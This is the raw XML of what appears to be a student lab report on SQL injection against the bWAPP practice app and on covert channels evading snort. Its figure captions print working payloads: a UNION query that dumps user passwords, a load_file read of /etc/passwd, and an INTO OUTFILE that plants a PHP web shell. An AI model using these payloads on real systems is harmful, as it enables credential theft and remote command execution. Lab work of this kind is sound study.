            <wp:extent cx="6858000" cy="4190365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1862748082"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48082" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4190365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="572DAEE7" w14:textId="40D40886" w:rsidR="009A350D" w:rsidRDefault="00D16FB9" w:rsidP="00E5761F">
      <w:r>
        <w:t>Figure 3.8 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">' and 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>1,login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>,password,4,5,6,7 from users#</w:t>
      </w:r>
      <w:r>
        <w:t>] to get an entire list of users and passwords from the user table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDDE9F" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="25D418FB" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="0423CB41" w14:textId="2CBD64AB" w:rsidR="00A3297B" w:rsidRDefault="00A3297B" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00A3297B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CBD0BB" wp14:editId="3E138341">
            <wp:extent cx="3477110" cy="4191585"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="601311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11709" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3477110" cy="4191585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E13DA6" w14:textId="43E9E0F6" w:rsidR="00A3297B" w:rsidRDefault="00D16FB9" w:rsidP="00D16FB9">
      <w:r>
        <w:t>Figure 3.9 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">' and 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>1,load</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>_file('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>/passwd'),3,4,5,6,7#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">], the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/password file is loaded using cmd load files. From here we can chain together SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>' and 1=2 union select "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t xml:space="preserve"> system($_REQUEST['cmd'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t xml:space="preserve">&gt;",2,3,4,5,6,7 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t xml:space="preserve"> "/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A3297B" w:rsidRPr="00A3297B">
        <w:t>"#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] to save the information to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC811C" w14:textId="77777777" w:rsidR="00A3297B" w:rsidRDefault="00A3297B" w:rsidP="00E5761F"/>
    <w:p w14:paraId="6E0323C1" w14:textId="0F5578F5" w:rsidR="00A3297B" w:rsidRDefault="00A3297B" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00A3297B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0E1882" wp14:editId="00CF1456">
            <wp:extent cx="5963482" cy="1343212"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="485193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193381" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5963482" cy="1343212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EB219" w14:textId="00E4D412" w:rsidR="00D16FB9" w:rsidRDefault="00D16FB9" w:rsidP="00E5761F">
      <w:r>
        <w:t xml:space="preserve">Figure 3.10 – Executing a call to the cmd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file shows the output data that we injected during our previous SQL attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAA784" w14:textId="77777777" w:rsidR="00A3297B" w:rsidRDefault="00A3297B" w:rsidP="00D16FB9">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C766E5D" w14:textId="77777777" w:rsidR="00A3297B" w:rsidRPr="00E5761F" w:rsidRDefault="00A3297B" w:rsidP="00E5761F"/>
    <w:p w14:paraId="32687B9E" w14:textId="77777777" w:rsidR="00A3297B" w:rsidRDefault="00A3297B" w:rsidP="00AD5F38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5684C70F" w14:textId="234BEA4E" w:rsidR="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED569E9" w14:textId="4053A42E" w:rsidR="00AD5F38" w:rsidRDefault="00D85544" w:rsidP="00AD5F38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc145876483"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38">
        <w:tab/>
        <w:t xml:space="preserve">Technical Review – </w:t>
      </w:r>
      <w:r w:rsidR="006D7673" w:rsidRPr="006D7673">
        <w:t>SQL Injection Chained Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6C08B375" w14:textId="4ECAC184" w:rsidR="00965F49" w:rsidRPr="00965F49" w:rsidRDefault="00965F49" w:rsidP="00965F49">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>exposed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web application, directly </w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and SQL backends, allow attackers to attempt complex chain SQL injections.  These chain injections are done to gather information on the schema of the databases as well as to capture sensitive data.  Depending on the host of the web application, attackers can expand their attack into shell commands by using the </w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application as the ‘caller’.  Since </w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have open permissions to the SQL back end as well as the host, attackers can use this as a front to execute malicious calls</w:t>
      </w:r>
      <w:r w:rsidR="00413048">
        <w:t>.  Such as viewing sensitive files using cmd load files or injecting their own malicious code into the PHP files on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47105821" w14:textId="3735EB9E" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc145876484"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0       Introduction – </w:t>
      </w:r>
      <w:r w:rsidR="003E080B" w:rsidRPr="003E080B">
        <w:t>Covert Channels/Evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7D273E25" w14:textId="63A474B8" w:rsidR="00C76C51" w:rsidRPr="00C76C51" w:rsidRDefault="00C76C51" w:rsidP="00C76C51">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Creating convert channels and evasion, attackers can use this to hide both their actions and create hidden messages between others.  This type of covert action evasion is critical in understanding as it can be a primary way in which an attacker may attempt to cover their tracks.  This is especially important when executing forensics on a compromised system and needing to see if any methods of evasion were executed or not by the said attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911CC38" w14:textId="77777777" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD45F35" w14:textId="06D29587" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_Toc145876485"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Lab Results – </w:t>
      </w:r>
      <w:r w:rsidR="003E080B" w:rsidRPr="003E080B">
        <w:t>Covert Channels/Evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="390DC7F7" w14:textId="77777777" w:rsidR="004271F7" w:rsidRDefault="004271F7" w:rsidP="004271F7"/>
    <w:p w14:paraId="52BEE6BD" w14:textId="2E81ABB0" w:rsidR="004271F7" w:rsidRDefault="004271F7" w:rsidP="004271F7">
      <w:r w:rsidRPr="004271F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA4491E" wp14:editId="1C95D6FF">
            <wp:extent cx="3362794" cy="3486637"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1241358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35860" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3362794" cy="3486637"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E412AA" w14:textId="74DF4555" w:rsidR="004271F7" w:rsidRDefault="004271F7" w:rsidP="00191684">
      <w:r>
        <w:t xml:space="preserve">Figure 4.0 – Load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mininet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to use in our attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F58D22" w14:textId="77777777" w:rsidR="00191684" w:rsidRDefault="00191684" w:rsidP="00191684"/>
    <w:p w14:paraId="6BA67C91" w14:textId="0209C03F" w:rsidR="00F01C8C" w:rsidRDefault="00F01C8C" w:rsidP="004271F7">
      <w:r w:rsidRPr="00F01C8C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B20D3A7" wp14:editId="1D448E4C">
            <wp:extent cx="5867400" cy="3975735"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="5797964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96425" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5867400" cy="3975735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B4C92B" w14:textId="05045DFC" w:rsidR="00F01C8C" w:rsidRDefault="00F01C8C" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.1 – Edit snort rules on watch for any system file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06C3F09D" w14:textId="77777777" w:rsidR="00F01C8C" w:rsidRDefault="00F01C8C" w:rsidP="004271F7"/>
    <w:p w14:paraId="5FC4B712" w14:textId="74641FE2" w:rsidR="00F01C8C" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402810F8" wp14:editId="2592CB24">
            <wp:extent cx="6858000" cy="1884680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="203680247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02478" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1884680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE6B8AA" w14:textId="7CFE0F3C" w:rsidR="00F01C8C" w:rsidRDefault="00F01C8C" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.2 – Run snort </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>comman</w:t>
      </w:r>
      <w:r w:rsidR="003153AE">
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B5C1DF9" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="0B8EBBB6" w14:textId="54102C2A" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7B3CAD" wp14:editId="11D35E2A">
            <wp:extent cx="4334480" cy="485843"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="840092480" name="Picture 1" descr="A numb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2480" name="Picture 1" descr="A number on a black background&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4334480" cy="485843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE93861" w14:textId="362564BE" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.3 – Set up </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection and listener on host 1 with port 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEB3B4" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="55A622CB" w14:textId="3F9A1090" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147A3131" wp14:editId="2EBDE637">
            <wp:extent cx="4191585" cy="447737"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1289799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99851" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4191585" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFF13A" w14:textId="4A419FE3" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t>Figure 4.4 – Setup a listener on host 2 on port 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B1B749" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="5092EC4C" w14:textId="4CA5F038" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14FD7F0B" wp14:editId="534D762B">
            <wp:extent cx="6858000" cy="3908425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16599496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49625" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3908425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007477A" w14:textId="4D8A3B9F" w:rsidR="003153AE" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t>Figure 4.5 - Cat</w:t>
      </w:r>
      <w:r w:rsidR="003153AE">
        <w:t xml:space="preserve"> out </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003153AE">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003153AE">
        <w:t xml:space="preserve">/passwd.  Action is not picked up on host 2 and we have gone in </w:t>
      </w:r>
      <w:r>
        <w:t>covertly and not picked up by snort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECCCD2B" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="31F0257B" w14:textId="08EA1F70" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C4B4D3" wp14:editId="4D59D1C7">
            <wp:extent cx="3229426" cy="2086266"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="163098353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83535" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3229426" cy="2086266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4FD9B1" w14:textId="0FC78D7B" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.6 – Close down </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mininet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on host 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D88B70" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="594FB5CC" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="719E9A76" w14:textId="64D8AEC8" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B615FB" wp14:editId="69D3C5CD">
            <wp:extent cx="6858000" cy="1398905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20812491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49128" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1398905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9542AA" w14:textId="01AEF664" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="003A0986">
      <w:r>
        <w:t xml:space="preserve">Figure 4.7 – Setup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to listen for key words secret on port 10000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B4859" w14:textId="77777777" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="003A0986"/>
    <w:p w14:paraId="29AE0628" w14:textId="2DCA36A7" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419F7A9C" wp14:editId="1E2F99A0">
            <wp:extent cx="3858163" cy="828791"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="93386466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864661" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3858163" cy="828791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
